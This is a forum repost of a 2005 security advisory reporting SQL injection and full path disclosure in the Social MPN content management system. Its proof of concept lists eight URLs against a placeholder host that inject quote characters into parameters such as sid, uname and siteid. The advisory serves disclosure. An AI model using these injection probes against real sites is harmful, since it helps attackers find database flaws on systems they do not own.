|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 54
Members: 0
Total: 54
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Social MPN Sql injection and full path disclosure |
|
Posted: Wed Jun 15, 2005 1:37 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
http://securitytracker.com/alerts/2005/Jun/1014214.html
/*
--------------------------------------------------------
-- www.sosvulnerable.net Security --
--------------------------------------------------------
Program: Social MPN
Homepage: http://www.socialmpn.com
Vulnerable Versions: all
Risk: high
Impact: sql injection and full path disclosure, attacker may execute
arbitrary SQL statements on the vulnerable system.
This may compromise the integrity of your database and expose
sensitive information.
-== ==-
--------------------------------------------------------------------------------------------
- Description
Social MPN is one CMS myPHPNuke like. SocialMPN The biggest change to
the system is the multi-site functionality we have incorporated into
the package. This allows you to run multiple websites from one install
of SocialMPN.
This can range to completely separate domains (ie: Ruffdogs.com,
vsadesign.com),
to an all inclusive site with user owned sections, or based on
sub-domains, guilinux.com,
mandrake.guilinux.com, fedora.guilinux.com, (wild cards must be
enabled on the server for
this).
--------------------------------------------------------------------------------------------
POC:
Tested with these query variables
http://xxx.xxx.xxx.xxx/article.php?sid=%27
http://xxx.xxx.xxx.xxx/user.php?uname='&pass=1&op=login
http://xxx.xxx.xxx.xxx/viewforum.php?forum=43&siteid=%2527
http://xxx.xxx.xxx.xxx/newtopic.php?username='&password=
http://xxx.xxx.xxx.xxx/sections.php?op=listarticles&secid=%27
http://xxx.xxx.xxx.xxx/sections.php?op=listarticles&artid=%2527
http://xxx.xxx.xxx.xxx/index.php?siteid='&op=show&aftersid=380
http://xxx.xxx.xxx.xxx/friend.php?sid=%2527&yname=1&ymail=1&fname=1&fmail=1&op=SendStory
--------------------------------------------------------------------------------------------
- Credits
-------------------------------------------------
Discovered by LINUX <admin@sosvulnerable.net> http://www.sosvulnerable.net/
Irc.gigachat.net #shell #uruguay
- Greets
--------------------------------------------------------
HaCkZataN, Ali, Waraxe (all waraxe forum members), Slimjim100,erg0t, b04 ,
beford, Mafia Boy (all Gigachat Irc people), .ru crew friends |
|
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|